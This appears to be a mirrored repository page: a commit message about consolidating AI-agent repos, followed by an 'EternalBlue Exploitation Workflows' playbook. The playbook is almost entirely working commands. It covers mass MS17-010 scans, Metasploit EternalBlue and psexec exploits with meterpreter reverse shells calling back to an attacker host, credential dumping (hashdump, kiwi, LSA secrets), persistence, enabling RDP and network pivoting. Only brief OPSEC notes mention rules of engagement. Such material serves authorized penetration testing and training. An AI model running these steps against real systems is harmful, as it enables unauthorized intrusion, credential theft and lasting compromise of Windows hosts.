mirror of
https://github.com/SHOGGOTH-SECTOR/sica-fondt.git
synced 2026-08-01 08:30:20 +00:00
Place useful parts of the surrounding repos into sica-fondt by layer, per the
body model (Ada = membrane; brain/endocrine/capabilities/knowledge non-Ada):
- brain/ LLM reasoning + providers (dapr, hermes, MoMoA)
- capabilities/ REPRAG sidecars: hermes tools/skills, dapr tools, parallel
dispatch, A51 channels, and the OSINT cluster
- knowledge/ LORAG corpus: 754 cyber-skills, agency personas, secure-coding,
MITRE ATT&CK data
- reference/ defensive threat-reference (C3, shhbruh doc) + AdaYaml parser
License handling: AGPL sources (worldosint, advanced_evolution, mercury,
Reticulum) and GPL DeTTECT are SPEC-only clean-room/port descriptions — no
copyleft code copied. MIT/Apache/data parts copied as working trees.
Safety: shhbruh escape/persistence material and C3 covert-C2 kept as reference
only, not wired into the running organism. See CONSOLIDATION.md.
https://claude.ai/code/session_01UehUqEXXJJCsHoA4voCU5c
2.1 KiB
2.1 KiB
EternalBlue Exploitation Workflows
Workflow 1: Vulnerability Detection
Nmap NSE Scripts
# Check for MS17-010 vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.0.0.0/24
# Extended SMB vulnerability scan
nmap -p 445 --script smb-vuln-* 10.0.0.1
# SMB version detection
nmap -p 445 --script smb-protocols 10.0.0.1
CrackMapExec
# Mass scan for MS17-010
crackmapexec smb 10.0.0.0/24 -M ms17-010
# Check with authentication
crackmapexec smb 10.0.0.0/24 -u user -p password -M ms17-010
Metasploit Auxiliary Scanner
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
set THREADS 10
run
Workflow 2: Exploitation with Metasploit
EternalBlue Module
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set LPORT 443
exploit
# Post-exploitation
meterpreter > getuid
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
EternalRomance/Synergy (PsExec variant)
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.0.0.1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set SMBUser ""
set SMBPass ""
exploit
Workflow 3: Post-Exploitation
Credential Dumping
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > kerberos_ticket_list
meterpreter > lsa_dump_secrets
Persistence
meterpreter > run persistence -U -i 30 -p 4444 -r 10.0.0.100
meterpreter > run post/windows/manage/enable_rdp
Pivoting
meterpreter > run post/multi/manage/autoroute
meterpreter > portfwd add -l 445 -p 445 -r 10.0.1.1
OPSEC Considerations
- EternalBlue exploitation is noisy and easily detected by IDS/IPS
- Modern EDR solutions detect named pipe and service creation patterns
- Exploitation may crash the target system (especially on 32-bit systems)
- Use only against confirmed vulnerable systems within ROE scope
- Prefer authenticated exploitation variants when credentials are available
- Document any system crashes or instability immediately